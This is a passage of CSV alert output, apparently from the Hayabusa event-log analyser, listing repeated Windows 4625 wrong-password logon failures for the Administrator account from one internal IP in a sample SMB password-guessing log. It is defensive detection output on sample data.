+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.485 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.609 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.718 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.761 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.807 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.881 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.923 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.039 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.121 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.165 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.345 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.562 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.607 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.782 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:41.957 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.045 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.082 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.273 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.472 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.517 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.566 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.692 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.944 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:42.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.023 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.189 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.353 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.553 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.713 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.757 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: 